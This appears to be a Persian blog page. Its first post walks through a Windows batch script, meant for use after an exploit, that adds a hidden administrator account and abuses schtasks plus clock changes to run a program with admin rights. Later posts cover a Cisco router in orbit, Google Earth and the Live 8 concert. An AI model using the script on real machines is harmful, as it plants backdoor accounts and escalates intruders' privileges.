privilege-scalation and Windows

سلام یه چند وقتیه که دیگه جلالم حوصله نوشتن نداره نمیدونم چرا درشو گل نمی گیریم!

چند وقت پیش یکی از دوستانم از من پرسید که چطور می تونه سطح دسترسی خودش رو تحت ویندوز افزایش بده و ایا چیزی شبیه su در ویندوز وجود داره یا نه. پاسخ من هم این بود که نه دقیقا. در واقع یه زمانی بود ولی حذف شد ولی شما می تونی با دستور RUNAS با دادن User و Password هر برنامه ای رو تحت امتیاز کابر خاصی مثلا Admin اجرا کنی.

دوست مورد بحث خوشحال رفت و ناراحت برگشت! گفت که این Runas منتظر Password نمیشه. بلافاصله یادم افتاد که توی Shell هایی که بوسیله Exploit های مختلف بوجود میان امکان استفاده از Runas وجود نداره چون برای پنهان کردن کاراکتر ها وارد یه حالت خاص میشه که این Shell ها قاط میزنن مساله وقتی هیجان برانگیز شد که سر نوشتن یه Batch فایل شرط بستیم با این شرایط که فقط از فایل های موجود در ویندوز استفاده بشه (نه یه برنامه جداگانه که قبلا انتقال داده شده) و 100% خودکار یه Exe خاص رو بتونه تحت امتیاز Admin اجرا کنه.

در راه اکتشافات برای جلوگیری از واژه غلط کردم و پس از کلی کلنجار مشخص شد هیچ راهی برای اجرای Runas در Shell های remote یا Telnet وجود نداره (ظاهرا این مشکل عمدا توسط مایکروسافت بوجود اومده). در واقع هر برنامه ای که نیاز به Password داره و از فانکشنی خاص (که اسمش الان یادم نیست)استفاده می کنه همین مشکل رو داره. پس جواب نهایی این بود که به دستوری نیازه که اینقدر احمق باشه که Password رو جزء پارامترهاش بگیره.

اما به طور مختصر جریان از این قراره که Schtasks دستور کنسولیه که برای زمان بندی کارها طراحی شده به این صورت که شما تعیین می کنید چه برنامه این در چه روز و ساعتی خودکار اجرا بشه که به درد Scan کردن خودکار ویروسها و یه همچین کارایی می خوره یه رابط گرفیکی هم داره که در Start>Control Panel > Scheduled Tasks قرار داره.

در ادامه Script نهایی رو اینجا میارم که امیدوارم به درد بخوره (در واقع فقط به درد افزایش دسترسی بعد از Exploit کردن می خوره) لازه به ذکره که این فقط به درد Scalation از System به Admin می خوره !

۱)NET USER DommyUserName /ADD
۲)NET USER DommyUserName dommypass
۳)NET LOCALGROUP Administrators DommyUserName /Add
۴)schtasks /create /tn dommytaskname  /sc daily /st 23:55:00 /ru
DommyUserName /rp dommypass /tr "Calc.exe"
۵)time 11:55:00
۶)ping 127.0.0.1 >> null
۷)time 23:55:00

توضیح:

  خط اول یه کابر به عنوان DommyUserName  میسازه – خط دوم پسورد این user رو  dommypass قرار میده – در خط سه این کابر به گروه Administator ها اضافه می شه تا دسترسی Admin داشته باشه – در خط بعد یک task برای ساعت 23:55 هر روز تخت کابر فوق بوجود میاد – خط 5 ساعت فعلی سیستم رو به یه ساعت خاص تغییر میده – از خط 6 برای بوجود آوردن 3 ثانیه وقفه استفاده شده – خط هفت ساعت سیستم رو برابر 23:55 دقیقه قرار می ده و Boom!

گاهی لازمه خطوط ۵ و ۶ و۷ چند بار تکرار بشن!

روتر های سیسکو در فضا


Next Generation of Networking: Mobile Router in Space

A Cisco Systems router launched into orbit has been successfully tested and demonstrated by an international government and private sector collaboration, showing how Internet Protocol (IP) can be used to communicate with satellite payloads in space. Cisco acted as a catalyst in bringing organizations in the defense, civil and commercial worlds together to test and demonstrate its router. The Cisco 3251 Mobile Access Router was launched into low Earth orbit onboard the UK-DMC (Disaster  Monitoring Consortium) satellite, built and operated by Surrey Satellite Technology, Ltd.

Google Earth – گردش در زمین

پشت مونیتور خود نشسته اید، چند کلیک می کنید و به نقشه دقیق محل مورد نظر خود دست پیدا می کنید. به  سرعت راه های رسیدن به آن محل را مورد بررسی قرار می دهید و اطلاعات کاملی در مورد آن محل کسب می  کنید. خوب در این حالت دو مورد امکان پذیر است، یا شما خواب می بینید و یا از سرویس Google Earth استفاده می کنید !!!

امشب این سرویس برای من به اندازه کافی جذاب بود که بعد از مدت ها از یک نرم افزار ( تحت ویندوز :)) )  لذت ببرم. از قابلیت های بسیار فوق العاده ی این سرویس گوگل ارائه نقشه تقریبا کامل و دقیق از تمام نقاط  دنیا و همینطور ذکر اطلاعات، رویداد ها و مکان های هر مکان را می توانم نام ببرم. همینطور قابلیت بی نظیر  فضای سه بعدی که برای حدود ۳۸ شهر آمریکا تا به حال فراهم شده است. امکان نمایش سه بعدی  تمام  ساختمان ها را در ابعاد واقعی در اختیار شما می گذارد. ( تنها ایراد این برنامه مصرف بسیار بالای پهنای باند آن  است که با توجه به حجم عظیم اطلاعاتش کاملا قابل درک است.)

 تصویری از شهر مشهد

تصویر سه بعدی یکی از شهرهای آمریکا


خلیج فارس

تمامی این سرویس ها با استفاده از تکنولوژی گوگل و سرویس های ماهواره ای شرکت Keyhole فراهم شده  اند و پیشنهاد می کنم کمی وقت برای جستجو در این برنامه اختصاص دهید. در مورد ایران هنوز اطلاعات خیلی  کامل نشده است اما تقریبا تمام جاهایی که من می شناختم به وضوح داخل نقشه نمایان بود. جزیره ها ، شهرها  ، قله دماوند دریاچه نمک و حتی حرم اما رضا. فکر می کنم به مرور تمامی نقاط دنیا را به صورت کامل تری تحت  پوشش قرار دهد.

    –   Google Earth – Explore, Search and Discover

    –    Common questions about Google Earth

بزرگترین کنسرت تاریخ موسیقی

بزرگترین کنسرت تاریخ موسیقی در حال شروع شدنه این کنسرت که توسط Bob Geldof با هدف تحت فشار قرار دادن گروه G8 که هموم سران هشت کشور صنعتی دنیا هستند برگذار می شه. در سایت رسمی این رویداد چنین آمده:

Every single day, 30,000 children die, needlessly, of extreme poverty. On July  ۶th, we finally have the opportunity to stop that shameful statistic. 8 world  leaders, gathered in Scotland for the G8 summit, will be presented with a  workable plan to double aid, drop the debt and make the trade laws fair. If these   men agree, then we will become the generation that made poverty history.

برای رای دادن می توانید به این صفحه مراجعه نمائید. این اعتراض قراره توسط یکی از طولانی ترین کنسرت  های دنیا با شرکت معروف ترن هنرمندان تاریخ موسیقی صورت بگیره و احتمالا حدود ۵ بیلیون بیننده خواهد  داشت. شک نکنید که گروه مورد علاقتون تو این کنسرت (در واقع چند کنسرت در سراسر دنیا) شرکت دارند. در  غیر این صورت بهتره در علاقتون تجدید نظر کنید! در هر صورت برای کسانی که مثل من امکان رفتن به Hyde  park  رو ندارند خبر خوب اینه که MTV و  VH1 (که چند ماهیه روی هاتبرد قابل دریافت هستند) قراره مستقیم  این رویداد رو پخش کنند. این اتفاق ساعت ۱۲:۰۰ EST یا به وقت ما اگر اشتباه نکنم ۲۱:۳۰ به وقوع می پیونده!  اینم لیست شرکت کنندگان:( فقط Hyde Park )

• African Children’s Choir
• Annie Lennox
• Bob Geldof
• Coldplay
• Dido
• Elton John
• Joss Stone
• Keane
• Killers, The
• Madonna
• Mariah Carey
• Ms. Dynamite
• Paul McCartney
• Pink Floyd
• Razorlight
• REM
• Robbie Williams
• Scissor Sisters
• Snoop Dogg
• Snow Patrol
• Stereophonics
• Sting
• Travis
• U2
• UB40
• Velvet Revolver

شماره نهم نشریه الکترونیک لینوکس منتشر شد

شماره نهم نشریه الکترونیک لینوکس منتشر شد٬ مقاله‌های منتشر شده در این شماره عبارتند از :